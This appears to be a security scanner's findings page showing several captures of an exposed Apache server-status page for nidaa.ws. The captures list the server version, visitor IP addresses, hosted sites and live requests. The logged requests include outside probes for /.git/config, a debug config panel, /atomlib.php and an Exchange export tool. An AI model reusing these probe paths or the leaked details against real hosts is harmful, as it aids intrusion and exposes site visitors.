      156.38.43.70http/1.1albayan.edu.sa:443GET /imgweb/file44/%D8%AA%D8%A7%D8%B1%D9%8A%D8%AE_%D8%A7%D9%84%
      
      0-8257790/146/6399_
      19.2048116726569610.050.771008.67
      172.71.137.132http/1.1sibaqulhorof.com:443GET /api/v1/app/friends HTTP/1.1
      
      0-8257790/181/6674_
      19.14715334077410.06.83888.49
      138.201.201.48http/1.1sulaimaniya.edu.sa:443POST /wp-cron.php?doing_wp_cron=1717375481.96987104415893554687
      
      0-8257790/204/6627_
      19.4441927100364800940.046.98923.95
      51.39.4.69http/1.1sulaimaniya.edu.sa:443GET /download/52/%D9%81%D9%8A%D8%B2%D9%8A%D8%A7%D8%A1/1903/%D8%
      
      0-8257790/181/6787_
      19.1765511762083480.021.43995.09
      172.71.137.134http/1.1sibaqulhorof.com:443POST /api/v1/app/question/get/single HTTP/1.1
      
      0-8257790/146/6438_
      19.48399251685520.064.891157.98
      45.55.201.79http/1.1albayan.edu.sa:443GET / HTTP/1.1
      
      0-8257790/162/6640_
      19.5435623376510270.042.611062.82
      51.211.168.249http/1.1jawad.com.sa:443GET /public/front_resources/fonts/fontawesome-webfont.ttf?v=4.7
      
      0-8257790/139/6756_
      19.651449647077510.012.691094.15
      54.36.148.68http/1.1daris.live:80GET /user?redirect=product/36 HTTP/1.1
      
      0-8257790/154/7308_
      19.20488652407320.012.151083.86
      5.41.4.44http/1.1jawad.com.sa:443GET /favicon.ico HTTP/1.1
      
      0-8257790/203/6730_
      19.553098047825150.05.801032.18
      40.77.167.60http/1.1albayan.edu.sa:443GET /web/41.html2 HTTP/1.1
      
      0-8257790/177/6765_
      19.147472242940600.09.85796.96
      120.239.27.242http/1.1php.we3dvi.com:80\x16\x03\x01\x02
      
      0-8257790/101/7265_
      19.5723512550341260.010.88714.95
      172.71.137.133http/1.1sibaqulhorof.com:443POST /api/v1/app/game/start HTTP/1.1
      
      0-8257790/85/6758_
      19.3542513851658400.024.751281.17
      172.71.137.134http/1.1sibaqulhorof.com:443GET /api/v1/app/friends/requests HTTP/1.1
      
      0-8257790/167/6601_
      19.175935450765820.011.861107.84
      93.158.90.65http/1.1trynidaa.com:80GET / HTTP/1.1
      
      0-8257790/147/6741_
      19.5434851983653380.016.08868.23
      51.211.168.249http/1.1jawad.com.sa:443GET /storage/app/public/uploads/products/0QyvrZ9vUTw8idh5IZhdmV
      
      0-8257790/94/6515_
      19.00461532654930.012.51912.94
      51.36.218.174http/1.1
      
      0-8257790/153/6601_
      19.1949626937901260.071.161101.91
      5.41.4.44http/1.1jawad.com.sa:443GET /public/front_resources/fonts/fontawesome-webfont.ttf?v=4.7
      
      0-8257790/132/6703_
      19.9002902379724700.077.931151.90
      51.39.4.69http/1.1sulaimaniya.edu.sa:443GET /download/52/%D9%81%D9%8A%D8%B2%D9%8A%D8%A7%D8%A1/1903/%D8%
      
      0-8257791/125/6850K
      19.9004437575866.831.601095.25
      172.70.247.87http/1.1nidaa.ws:80GET / HTTP/1.1
      
      0-8257790/118/7008_
      19.0939930850627990.069.071022.50
      45.55.201.79http/1.1
      
      0-8257790/114/6488_
      19.6613610207510150.08.91805.76
      91.92.248.34http/1.1jawad.com.sa:443GET /ar HTTP/1.1
      
      0-8257790/133/6696_
      19.16684257840880.04.821055.08
      5.110.218.24http/1.1albayan.edu.sa:443GET /e_sch/js/pe.kenburns/themes/default/img/spinner.gif HTTP/1
      
      0-8257790/127/6575_
      19.48408350453900.08.471130.91
      31.167.113.150http/1.1albayan.edu.sa:443GET /e_sch/Fonts/font6/ge-ss-med.woff HTTP/1.1
      
      0-8257790/112/6866_
      19.6318494939130190.028.491116.33
      66.249.64.13http/1.1albayan.edu.sa:443GET /imgweb/book/mnahkam.pdf HTTP/1.1
      
      0-8257790/114/6856_
      19.6684043700530.078.491183.78
      66.249.64.128http/1.1jawad.com.sa:80GET / HTTP/1.1
      
      1-8258120/166/6101_
      20.10362270266370.011.171146.33
      169.148.106.12http/1.1albayan.edu.sa:443GET /js/jquery-1.3.2.js HTTP/1.1
      
      1-8258120/211/6412_
      19.98511362584110.070.871192.44
      51.36.218.174http/1.1albayan.edu.sa:443GET /images/slider/02_s.jpg HTTP/1.1
      
      1-8258120/138/6840_
      19.78374151508510.031.811110.90
      51.39.4.69http/1.1
      
      1-8258120/106/6611_
      20.141439688899680.030.92843.24
      172.71.114.209http/1.1sibaqulhorof.com:443GET /api/v1/app/general/TopPlayers?type=1 HTTP/1.1
      
      1-8258120/131/6196_
      19.857027061226120.058.031037.00
      54.175.74.27http/1.1albayan.edu.sa:443GET /albayan_library/index.php HTTP/1.1
      
      1-8258120/139/6553_
      20.1136010156609590.025.60941.17
      51.211.168.249http/1.1jawad.com.sa:443GET /public/front_resources/fonts/fontawesome-webfont.woff?v=4.
      
      1-8258120/142/6505_
      19.847184582635890.023.641041.12
      66.249.64.164http/1.1jilani.com.sa:443GET /en HTTP/1.1
      
      1-8258120/181/6663_
      19.81152144208530.013.218
      Found on 2024-06-03 00:56
    • Severity: medium
      Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31d7a83140d7a83140ab699dbe

      Apache Status
      
      Apache Server Status for www.nidaa.ws (via 138.201.201.48)
      
      Server Version: Apache/2.4.59 (cPanel) OpenSSL/1.1.1w mod_bwlimited/1.4 Phusion_Passenger/6.0.22
      Server MPM: worker
      Server Built: May 22 2024 00:34:08
      
      Current Time: Sunday, 02-Jun-2024 20:15:57 +03
      Restart Time: Thursday, 23-May-2024 04:04:49 +03
      Parent Server Config. Generation: 9
      Parent Server MPM Generation: 8
      Server uptime:  10 days 16 hours 11 minutes 7 seconds
      Server load: 0.56 0.44 0.41
      Total accesses: 1482679 - Total Traffic: 213.2 GB - Total Duration: 1651143717
      CPU Usage: u595.76 s51.84 cu6400.73 cs1415.64 - .918% CPU load
      1.61 requests/sec - 242.4 kB/second - 150.8 kB/request - 1113.62 ms/request
      17 requests currently being processed, 0 workers gracefully restarting, 233 idle workers
      ________________K_________K__________W____________..............
      ..........._W________W________________K______________________WWW
      WWWWWWWWWWWWWWWWWWWWWW........................._________________
      __W_K______________W___RW____K_____K____________________________
      ________________K______________K_________________K______________
      ___R_...........................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ........
      Scoreboard Key:
      "_" Waiting for Connection, 
      "S" Starting up, 
      "R" Reading Request,
      "W" Sending Reply, 
      "K" Keepalive (read), 
      "D" DNS Lookup,
      "C" Closing connection, 
      "L" Logging, 
      "G" Gracefully finishing, 
      "I" Idle cleanup of worker, 
      "." Open slot with no current process
      
      
      
      SrvPIDAccMCPU
      SSReqDurConnChildSlotClientProtocolVHostRequest
      
      0-8284830/123/7219_
      15.819915553245950.011.21928.30
      172.70.156.150http/1.1sibaqulhorof.com:443GET /api/v1/app/general/maintenance_check HTTP/1.1
      
      0-8284830/111/6216_
      15.791404625884020.040.99955.40
      42.236.17.68http/1.1jawad.com.sa:443GET / HTTP/1.1
      
      0-8284830/91/6440_
      15.77158633650380.033.52879.55
      172.71.130.70http/1.1qr.brunch.ws:443GET /storage/food_image/17162865595793_pumpkinlatte.jpg HTTP/1.
      
      0-8284830/90/6363_
      15.771573363711910.012.18875.35
      141.101.97.53http/1.1qr.brunch.ws:443GET /storage/food_image/17088461776104_oip7.jpg HTTP/1.1
      
      0-8284830/109/6573_
      15.8914261670050.08.52953.21
      209.38.18.93http/1.1php.we3dvi.com:80GET /favicon.ico HTTP/1.1
      
      0-8284830/97/6232_
      15.8924249509540.031.201090.51
      128.234.28.187http/1.1albayan.edu.sa:443GET /e_sch/Fonts/font6/ge-ss-med.woff HTTP/1.1
      
      0-8284830/122/6442_
      15.863816648596480.07.69996.42
      172.71.112.142http/1.1sibaqulhorof.com:443POST /api/v1/app/auth/avatar/update HTTP/1.1
      
      0-8284830/202/6553_
      15.827717146472220.059.991074.67
      172.70.156.150http/1.1sibaqulhorof.com:443GET /api/v1/app/general/TopPlayers?type=1 HTTP/1.1
      
      0-8284830/90/7108_
      15.74160552204270.06.611069.14
      172.71.135.112http/1.1qr.brunch.ws:443GET /storage/food_image/17162858218837_lemonwithmintcocktail.jp
      
      0-8284830/154/6453_
      15.7910910047558370.07.541021.78
      172.70.203.144http/1.1sibaqulhorof.com:443GET /api/v1/app/friends HTTP/1.1
      
      0-8284830/160/6517_
      15.68163228242555110.027.56784.07
      141.101.96.15http/1.1qr.brunch.ws:443GET /storage/food_image/17088521884032_img9ad68aa995054d8fbb12e
      
      0-8284830/135/7114_
      15.854896249972000.017.04700.39
      52.167.144.16http/1.1zed.sa:443GET /product/hummus-vegan HTTP/1.1
      
      0-8284830/180/6616_
      15.6816310448527910.036.671222.40
      172.69.222.109http/1.1qr.brunch.ws:443GET /storage/category_image/17098162451335_12.png HTTP/1.1
      
      0-8284830/149/6388_
      15.721615450425480.09.341089.20
      172.69.222.245http/1.1qr.brunch.ws:443GET /storage/food_image/17088535367542_imgd0268fa62d0c437fad637
      
      0-8284830/68/6552_
      15.75158581478820.020.47805.26
      172.71.135.56http/1.1qr.brunch.ws:443GET /storage/food_image/17162863264413_almondcoffeecup.jpg HTTP
      
      0-8284830/124/6370_
      15.711625132361720.032.02897.21
      172.71.122.203http/1.1qr.brunch.ws:443GET /storage/food_image/17085203627110_imgba5677885d994e3f8d943
      
      0-8284831/101/6396K
      15.890136648560.87.861027.66
      172.70.251.69http/1.1nidaa.ws:80GET /server HTTP/1.1
      
      0-8284830/115/6537_
      15.74160176844260.014.431051.10
      172.69.222.11http/1.1qr.brunch.ws:443GET /storage/food_image/17162858719396_iceespresso.jpg HTTP/1.1
      
      0-8284830/115/6618_
      15.873715243402280.025.491061.26
      128.234.28.187http/1.1albayan.edu.sa:443GET /school/school/image_max/web/image_news/________1_11.png HT
      
      0-8284830/228/6833_
      15.85447847630240.013.52950.52
      172.71.112.156http/1.1sibaqulhorof.com:443GET /api/v1/app/general/game_version HTTP/1.1
      
      0-8284830/80/6324_
      15.846814205941740.03.26794.30
      151.254.239.194http/1.1jawad.com.sa:443POST /api/v.1/front/visitor/count HTTP/1.1
      
      0-8284830/88/6518_
      15.70162649976670.05.021043.62
      172.69.223.36http/1.1qr.brunch.ws:443GET /storage/food_image/17096771367772_fajita.webp HTTP/1.1
      
      0-8284830/97/6417_
      15.80107950058320.04.421118.84
      46.251.129.255http/1.1albayan.edu.sa:443GET / HTTP/1.1
      
      0-8284830/106/6691_
      15.28147375038532820.028.321019.18
      31.167.192.9http/1.1
      
      0-8284830/159/6696_
      15.83744342967420.06.801103.28
      151.254.166.7http/1.1jawad.com.sa:443POST /api/v.1/front/new/product?page=0 HTTP/1.1
      
      1-8290400/97/5806_
      13.37231183269944770.011.541120.14
      156.197.129.1http/1.1albayan.edu.sa:443GET /imgweb/book/mawsoaejaz.pdf HTTP/1.1
      
      1-8290402/60/6145K
      13.401158869071150.636.591114.63
      142.154.47.133http/1.1albayan.edu.sa:443GET /favicon.ico HTTP/1.1
      
      1-8290400/206/6645_
      13.03161547871860.03.391073.18
      172.69.223.187http/1.1qr.brunch.ws:443GET /storage/food_image/17096777357107_nutella.webp HTTP/1.1
      
      1-8290400/94/6462_
      13.32389888186200.010.22809.59
      172.71.112.151http/1.1sibaqulhorof.com:443GET /api/v1/app/general/maintenance_check HTTP/1.1
      
      1-8290400/69/6004_
      13.30561357080120.09.22974.51
      151.254.239.194http/1.1jawad.com.sa:443POST /api/v.1/front/rating/like HTTP/1.1
      
      1-8290400/92/6359_
      13.119911056010320.028.51908.16
      172.70.203.157http/1.1sibaqulhorof.com:443POST /api/v1/app/auth/info HTTP/1.1
      
      1-8290400/106/6296_
      13.127710772561630.06.911011.78
      Found on 2024-06-02 17:15
    • Severity: medium
      Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31d7a83140d7a83140613027bf

      Apache Status
      
      Apache Server Status for www.nidaa.ws (via 138.201.201.48)
      
      Server Version: Apache/2.4.59 (cPanel) OpenSSL/1.1.1w mod_bwlimited/1.4 Phusion_Passenger/6.0.22
      Server MPM: worker
      Server Built: May 22 2024 00:34:08
      
      Current Time: Sunday, 02-Jun-2024 01:03:30 +03
      Restart Time: Thursday, 23-May-2024 04:04:49 +03
      Parent Server Config. Generation: 9
      Parent Server MPM Generation: 8
      Server uptime:  9 days 20 hours 58 minutes 40 seconds
      Server load: 1.49 0.93 0.67
      Total accesses: 1353034 - Total Traffic: 193.9 GB - Total Duration: 1477126991
      CPU Usage: u916.65 s116.36 cu5497.83 cs1237.95 - .911% CPU load
      1.59 requests/sec - 238.3 kB/second - 150.2 kB/request - 1091.71 ms/request
      26 requests currently being processed, 0 workers gracefully restarting, 224 idle workers
      ________________K______K___R___________________K__________K_____
      ___K_____K__________K_____K__W______W____________K_______R___WWW
      WWWWWWWWWWWWWWWWWWWWWW______K_______R_______K__C____KR__________
      _______________R___K__________________K__R____________K________K
      _____________R_____.............................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ........
      Scoreboard Key:
      "_" Waiting for Connection, 
      "S" Starting up, 
      "R" Reading Request,
      "W" Sending Reply, 
      "K" Keepalive (read), 
      "D" DNS Lookup,
      "C" Closing connection, 
      "L" Logging, 
      "G" Gracefully finishing, 
      "I" Idle cleanup of worker, 
      "." Open slot with no current process
      
      
      
      SrvPIDAccMCPU
      SSReqDurConnChildSlotClientProtocolVHostRequest
      
      0-8164280/338/6589_
      48.92300351399540.076.32862.67
      138.201.201.48http/1.1sulaimaniya.edu.sa:443POST /wp-cron.php?doing_wp_cron=1717279110.08652806282043457031
      
      0-8164280/357/5680_
      49.0623124087490.044.42833.45
      138.197.191.87http/1.1white-petals.com:80GET / HTTP/1.1
      
      0-8164280/328/5943_
      48.92311223927162880.023.61737.78
      51.39.229.33http/1.1albayan.edu.sa:443GET /imgweb/1/sincestd1.pdf HTTP/1.1
      
      0-8164280/327/5892_
      49.012182362497700.094.87822.88
      93.168.9.169http/1.1albayan.edu.sa:443GET /favicon.ico HTTP/1.1
      
      0-8164280/383/6101_
      48.659314557630880.065.86885.11
      5.156.47.84http/1.1
      
      0-8164280/353/5740_
      48.9827024547945710.051.731036.32
      95.177.163.4http/1.1sulaimaniya.edu.sa:443GET /wp-content/uploads/2021/12/1E3A0598-scaled.jpg HTTP/1.1
      
      0-8164280/369/5897_
      49.091647191470.069.08822.75
      51.39.209.4http/1.1jawad.com.sa:443GET /favicon.ico HTTP/1.1
      
      0-8164280/360/5843_
      49.063112139614500.018.20911.17
      51.39.209.4http/1.1jawad.com.sa:443GET /public/front_resources/fonts/fontawesome-webfont.ttf?v=4.7
      
      0-8164280/359/6556_
      49.035531349275370.087.701022.42
      51.39.209.4http/1.1jawad.com.sa:443GET /public/front_resources/fonts/fontawesome-webfont.ttf?v=4.7
      
      0-8164280/318/5828_
      48.863607346478300.033.47962.92
      172.69.223.161http/1.1sibaqulhorof.com:443POST /api/v1/app/auth/avatar/update HTTP/1.1
      
      0-8164280/333/5890_
      49.07131238453310.018.71730.44
      172.105.197.17http/1.1white-petals.com:443GET /server HTTP/1.1
      
      0-8164280/408/6625_
      48.8634911845783240.062.93639.82
      172.71.131.162http/1.1sibaqulhorof.com:443GET /api/v1/app/friends/requests HTTP/1.1
      
      0-8164280/398/6072_
      49.11728447818380.069.781159.04
      51.252.141.253http/1.1jawad.com.sa:443GET /public/front_resources/fonts/fontawesome-webfont.ttf?v=4.7
      
      0-8164280/332/5873_
      49.02164247245930.048.40984.10
      83.147.52.49http/1.1sradmin.3dvi.com:443GET /var/.git/config HTTP/1.1
      
      0-8164280/353/6061_
      48.76201079449740.020.63768.60
      172.105.197.17http/1.1
      
      0-8164280/321/5884_
      49.00265229730720.042.10827.26
      52.230.152.100http/1.1wahjcm.com:443GET /fonts/Cairo-Regular.woff HTTP/1.1
      
      0-8164281/446/5887K
      49.120133288400.856.32930.49
      172.69.150.52http/1.1nidaa.ws:80GET /debug/default/view?panel=config HTTP/1.1
      
      0-8164280/347/5940_
      48.992751387974000460.055.96939.11
      216.244.66.198http/1.1albayan.edu.sa:443GET /imgweb/cur1439/6/fonst2.pdf HTTP/1.1
      
      0-8164280/385/6155_
      49.0623038885940.097.51953.44
      138.197.191.87http/1.1white-petals.com:80GET /.DS_Store HTTP/1.1
      
      0-8164280/422/6185_
      48.661059042180070.0154.51880.06
      66.118.185.42http/1.1
      
      0-8164280/405/5838_
      49.0435101205138500.032.44746.24
      51.39.209.4http/1.1jawad.com.sa:443GET /public/front_resources/fonts/fontawesome-webfont.ttf?v=4.7
      
      0-8164280/370/6041_
      49.03502445332670.0171.53967.69
      51.39.209.4http/1.1jawad.com.sa:443POST /api/v.1/front/new/product?page=0 HTTP/1.1
      
      0-8164280/326/5887_
      49.121448941930.0145.101094.47
      51.252.141.253http/1.1jawad.com.sa:443GET /storage/app/public/uploads/products/tOjex3mEFyPsbTAT8gkfRn
      
      0-8164281/327/6163K
      49.122234574776.722.22726.91
      172.71.81.34http/1.1eg.daaris.com:443GET /atomlib.php HTTP/1.1
      
      0-8164280/338/6075_
      49.00251340550190.067.821061.05
      138.201.201.48http/1.1trynidaa.com:443POST /wp-cron.php?doing_wp_cron=1717279159.10328292846679687500
      
      1-8113790/708/5387_
      84.08218565476300.0109.801045.61
      172.71.114.170http/1.1sibaqulhorof.com:443GET /api/v1/app/general/maintenance_check HTTP/1.1
      
      1-8113790/616/5708_
      84.0546057629860.0191.611057.45
      66.249.73.65http/1.1albayan.edu.sa:80GET /imgweb/file42/book/1/c0992e54-GE-ME-K07-SM1-tart.pdf HTTP/
      
      1-8113790/657/6023W
      83.890344610880.0174.141025.77
      51.252.141.253http/1.1jawad.com.sa:443GET /storage/app/public/uploads/products/E1IXdgUbB5JhnLG9f24t9z
      
      1-8113790/554/5930_
      83.992417739271270.087.09786.32
      162.158.203.8http/1.1sibaqulhorof.com:443POST /api/v1/app/auth/info HTTP/1.1
      
      1-8113790/705/5587_
      84.121098055650950.069.16927.14
      66.249.73.78http/1.1albayan.edu.sa:443GET /albayan_library/upload/books/24_68712-02.pdf HTTP/1.1
      
      1-8113790/664/5845_
      83.522015353362660.074.42817.43
      172.105.197.17http/1.1
      
      1-8113790/661/5816_
      84.0120963071565550.088.25979.12
      176.18.45.48http/1.1albayan.edu.sa:443GET /imgweb/file44/11111%20(3).pdf HTTP/1.1
      
      1-8113790/624/5863
      Found on 2024-06-01 22:03
    • Severity: medium
      Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31d7a83140d7a831403259a03a

      Apache Status
      
      Apache Server Status for www.nidaa.ws (via 138.201.201.48)
      
      Server Version: Apache/2.4.59 (cPanel) OpenSSL/1.1.1w mod_bwlimited/1.4 Phusion_Passenger/6.0.22
      Server MPM: worker
      Server Built: May 22 2024 00:34:08
      
      Current Time: Saturday, 01-Jun-2024 17:01:46 +03
      Restart Time: Thursday, 23-May-2024 04:04:49 +03
      Parent Server Config. Generation: 9
      Parent Server MPM Generation: 8
      Server uptime:  9 days 12 hours 56 minutes 56 seconds
      Server load: 0.30 0.39 0.40
      Total accesses: 1286031 - Total Traffic: 184.4 GB - Total Duration: 1419444042
      CPU Usage: u609.67 s58.31 cu5497.83 cs1237.95 - .898% CPU load
      1.56 requests/sec - 234.5 kB/second - 150.3 kB/request - 1103.74 ms/request
      9 requests currently being processed, 0 workers gracefully restarting, 216 idle workers
      ____________________K_______W___________________________K_______
      _________________K__________________K________________________WWW
      WWWWWWWWWWWWWWWWWWWWWW_K________________________________________
      _____R_____________________K_________________K____________......
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ........
      Scoreboard Key:
      "_" Waiting for Connection, 
      "S" Starting up, 
      "R" Reading Request,
      "W" Sending Reply, 
      "K" Keepalive (read), 
      "D" DNS Lookup,
      "C" Closing connection, 
      "L" Logging, 
      "G" Gracefully finishing, 
      "I" Idle cleanup of worker, 
      "." Open slot with no current process
      
      
      
      SrvPIDAccMCPU
      SSReqDurConnChildSlotClientProtocolVHostRequest
      
      0-8164280/70/6321_
      13.0045248461210.012.76799.10
      145.82.194.115http/1.1albayan.edu.sa:443GET /e_sch/js/pe.kenburns/themes/default/img/video.png HTTP/1.1
      
      0-8164280/76/5399_
      12.90133423388040.08.58797.61
      119.156.228.69http/1.1jawad.com.sa:443GET /storage/app/public/uploads/products/vBf31fXv4mpCKGy62qfYEj
      
      0-8164280/70/5685_
      12.93117326607890.03.42717.58
      95.216.222.140http/1.1jawad.com.sa:443GET /public/front_resources/fonts/fontawesome-webfont.woff?v=4.
      
      0-8164280/55/5620_
      12.541815362125030.080.99809.01
      2.90.74.253http/1.1
      
      0-8164280/91/5809_
      12.9780156801520.048.17867.41
      66.249.73.76http/1.1albayan.edu.sa:443GET /e_sch/Fonts/font6/ge-ss-med.woff HTTP/1.1
      
      0-8164280/100/5487_
      12.91129176047036360.03.16987.75
      78.95.35.13http/1.1albayan.edu.sa:443GET /imgweb/file44/WBs%20on%20Site%2022-23/7th/7th%20BS-T%201-2
      
      0-8164280/88/5616_
      12.78204246056830.025.74779.41
      51.36.87.159http/1.1jawad.com.sa:443GET /favicon.ico HTTP/1.1
      
      0-8164280/67/5550_
      12.841933739132850.02.68895.65
      51.36.87.159http/1.1jawad.com.sa:443POST /api/v.1/front/rating/like HTTP/1.1
      
      0-8164280/126/6323_
      12.8220312744564210.011.99946.71
      172.70.158.133http/1.1sibaqulhorof.com:443GET /api/v1/app/friends HTTP/1.1
      
      0-8164280/43/5553_
      12.85156128544064060.06.75936.20
      176.16.144.3http/1.1albayan.edu.sa:443GET /imgweb/files41/6.pdf HTTP/1.1
      
      0-8164280/57/5614_
      12.94954237808950.07.45719.18
      95.216.222.140http/1.1jawad.com.sa:443GET /storage/app/public/uploads/products/QDahnPgoWT32JEtJ5QIIF3
      
      0-8164280/116/6333_
      12.632009742764900.06.92583.81
      5.244.10.94http/1.1
      
      0-8164280/122/5796_
      12.8319626245906200.08.601097.86
      5.244.10.94http/1.1albayan.edu.sa:443GET /favicon.ico HTTP/1.1
      
      0-8164280/79/5620_
      12.86157546797880.020.96956.66
      66.249.65.199http/1.1alezdhar.com:443GET /videos/Zed-1296-1.mp4 HTTP/1.1
      
      0-8164280/89/5797_
      13.01289677239630.07.83755.80
      172.69.238.147http/1.1sibaqulhorof.com:443GET /api/v1/app/friends HTTP/1.1
      
      0-8164280/53/5616_
      13.0264527215440.02.37787.52
      66.249.65.102http/1.1jilani.com.sa:443GET /en HTTP/1.1
      
      0-8164280/163/5604_
      12.8913913432392700.030.96905.12
      172.70.158.133http/1.1sibaqulhorof.com:443GET /api/v1/app/friends HTTP/1.1
      
      0-8164280/105/5698_
      12.9684072970120.022.45905.59
      66.249.73.66http/1.1albayan.edu.sa:80GET /web.html HTTP/1.1
      
      0-8164280/68/5838_
      12.9687232389360.018.52874.45
      188.132.53.136http/1.1albayan.edu.sa:443GET /e_sch/Fonts/font6/ge-ss-med.woff HTTP/1.1
      
      0-8164280/120/5883_
      12.921132540054820.0106.75832.29
      119.156.228.69http/1.1jawad.com.sa:443POST /api/v.1/front/visitor/count HTTP/1.1
      
      0-8164281/76/5509K
      13.0202204227850.94.13717.93
      172.70.110.10http/1.1nidaa.ws:80GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor
      
      0-8164280/78/5749_
      12.8518410044858340.0159.54955.70
      172.71.131.161http/1.1sibaqulhorof.com:443GET /api/v1/app/general/maintenance_check HTTP/1.1
      
      0-8164280/69/5630_
      12.831916946410900.08.28957.65
      172.71.126.176http/1.1sibaqulhorof.com:443GET /api/v1/app/general/game_version HTTP/1.1
      
      0-8164280/78/5914_
      12.9769033827470.09.12713.81
      127.0.0.1http/1.1php.we3dvi.com:80GET / HTTP/1.0
      
      0-8164280/67/5804_
      12.93119140272340.056.571049.79
      95.216.222.140http/1.1jawad.com.sa:443GET /public/front_resources/fonts/fontawesome-webfont.woff2?v=4
      
      1-8113790/395/5074_
      47.841932864593320.077.431013.25
      51.36.87.159http/1.1jawad.com.sa:443POST /api/v.1/front/related/product HTTP/1.1
      
      1-8113790/307/5399_
      47.9945055956050.0101.26967.10
      145.82.194.115http/1.1albayan.edu.sa:443GET /images/image1.jpg HTTP/1.1
      
      1-8113790/416/5782_
      47.921152843871740.079.55931.17
      95.216.222.140http/1.1jawad.com.sa:443GET /public/front_resources/fonts/fontawesome-webfont.ttf?v=4.7
      
      1-8113790/303/5679W
      47.770038187160.048.57747.80
      162.158.155.65http/1.1nidaa.ws:80GET /server-status HTTP/1.1
      
      1-8113790/327/5209_
      47.8914368052146170.027.13885.10
      119.156.228.69http/1.1jawad.com.sa:443GET /public/front_resources/fonts/fontawesome-webfont.ttf?v=4.7
      
      1-8113790/375/5556_
      47.9211949751933870.034.85777.86
      119.156.228.69http/1.1jawad.com.sa:443GET /public/front_resources/fonts/fontawesome-webfont.woff?v=4.
      
      1-8113790/343/5498_
      47.8518410070285800.071.13962.00
      172.71.126.205http/1.1sibaqulhorof.com:443GET /api/v1/app/general/TopPlayers?type=1 HTTP/1.1
      
      1-8
      Found on 2024-06-01 14:01
    • Severity: medium
      Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31d7a83140d7a831401f6171b1

      Apache Status
      
      Apache Server Status for www.nidaa.ws (via 138.201.201.48)
      
      Server Version: Apache/2.4.59 (cPanel) OpenSSL/1.1.1w mod_bwlimited/1.4 Phusion_Passenger/6.0.22
      Server MPM: worker
      Server Built: May 22 2024 00:34:08
      
      Current Time: Thursday, 30-May-2024 22:27:48 +03
      Restart Time: Thursday, 23-May-2024 04:04:49 +03
      Parent Server Config. Generation: 7
      Parent Server MPM Generation: 6
      Server uptime:  7 days 18 hours 22 minutes 58 seconds
      Server load: 0.49 0.33 0.27
      Total accesses: 1060720 - Total Traffic: 152.4 GB - Total Duration: 1167301054
      CPU Usage: u826.64 s120.65 cu4224 cs945.69 - .912% CPU load
      1.58 requests/sec - 238.2 kB/second - 150.7 kB/request - 1100.48 ms/request
      10 requests currently being processed, 0 workers gracefully restarting, 240 idle workers
      _____________________K__________________________________________
      ____________________________K________________________________WWW
      WWWWWWWWWWWWWWWWWWWWWW_____________________RK_____K_____________
      ___________K___K_____________________________W__R_______________
      _____________C_____.............................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
